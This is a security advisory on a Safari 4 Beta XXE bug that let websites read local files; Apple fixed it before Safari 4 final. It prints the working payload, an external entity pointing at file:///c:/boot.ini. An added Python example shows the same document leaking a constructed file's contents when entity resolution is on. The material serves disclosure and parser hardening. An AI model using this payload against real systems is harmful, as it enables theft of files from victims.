CESA-2009-007 - rev 1
[See all my vulnerabilities at
http://scary.beasts.org/security]
[Blog if you want to subscribe to new findings is at
http://scarybeastsecurity.blogspot.com/]
Apple Safari 4 Beta local file theft bug
Programs affected: Safari 4 Beta; fixed in Safari 4 final
Severity: Websites can steal files from the victim's computer
This bug is a bonus addendum to
this unpleasant XXE-based file theft attack.
It is another Safari XXE attack that my colleague Carlos Pizano initially
suggested might be possible based on the Chrome sandbox preventing network
libraries being loaded. So full credit to Carlos for getting me to look into
this further. All I did was create a file-stealing test case for Safari 4
Beta.
The great news here is that Apple responded swiftly and fixed this in time for
Safari 4 final. Therefore, to the best of my knowledge, this bug never shipped
in a production release of the browser. (Safari 3 is unaffected because the
cause of the bug appears to be a regression in more recent versions of WebKit.)
Here's the simple attack code. We just need to serve it with an XML MIME type
(such as text/xml or application/xml). As can be seen, it's a much simpler XXE
attack vector: a single external entity declared with a SYSTEM identifier that
points at a local file:// URL, and the browser's XML parser expands the file's
contents into the document when it resolves &ent;:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///c:/boot.ini"> ]>
<root>
<element>Gimme ur filez?</element>
<element>&ent;</element>
</root>
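To make the mechanism concrete, here is an added example (mine, not code from the advisory or from Apple/WebKit): the same document as above is fed to Python's xml.sax parser twice, once with external general entity resolution switched on, which reproduces what the Safari 4 Beta parser effectively did with the SYSTEM entity, and once with it switched off, which is the hardened setting and the stdlib default since Python 3.7.1. The temporary file, its "secret: hunter2" content and all function names are my own constructions; only the XML shape is taken from the advisory, with the SYSTEM target swapped from c:/boot.ini to the constructed file.

```python
"""Added example (not from the original advisory): parse the advisory's XXE
document with a generic XML parser and compare what happens when the parser
resolves external general entities versus when it does not."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_payload(local_path):
    """Same document as the advisory, with the file:// target parameterised."""
    uri = pathlib.Path(local_path).resolve().as_uri()  # e.g. file:///tmp/...
    return (
        f'<!DOCTYPE doc [ <!ENTITY ent SYSTEM "{uri}"> ]>'
        "<root>"
        "<element>Gimme ur filez?</element>"
        "<element>&ent;</element>"
        "</root>"
    ).encode()


class ElementTextCollector(ContentHandler):
    """Collects the text of every <element>, after entity expansion."""

    def __init__(self):
        super().__init__()
        self.elements = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "element":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "element":
            self.elements.append("".join(self._buf))
            self._buf = None


def parse_elements(xml_bytes, resolve_external_entities):
    """Parse with xml.sax. The feature flag decides whether SYSTEM entities
    are fetched: off is the hardened setting (stdlib default since 3.7.1),
    on reproduces the behaviour the advisory describes in Safari 4 Beta."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = ElementTextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.elements


def demo():
    """Stand in for boot.ini with a constructed secret file (hypothetical
    content), parse the payload both ways and return the <element> texts."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    try:
        with os.fdopen(fd, "w") as f:
            f.write("secret: hunter2\n")  # constructed sample content
        payload = build_payload(path)
        return {
            "resolving": parse_elements(payload, True),
            "hardened": parse_elements(payload, False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, elements in demo().items():
        print(f"{mode:9s} -> {elements!r}")
```

With resolution enabled the second <element> carries the file's contents, which is exactly the data a page could then read back out of the parsed document; with it disabled the entity expands to nothing. The same check, a SYSTEM entity pointing at a known local file, is a quick way to find out whether any XML parser you depend on resolves external entities by default.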
Demo: Click here for Safari 4 Beta / Windows
Credits
- Carlos Pizano - who initially noted strange behaviour in the context of the
Chrome sandbox shutting a network-based XXE sample file down hard.
- Google - researched further on Google's time. Be aware that nothing on my
personal pages or blog represents Google... obviously.
Chris Evans
scarybeasts@gmail.com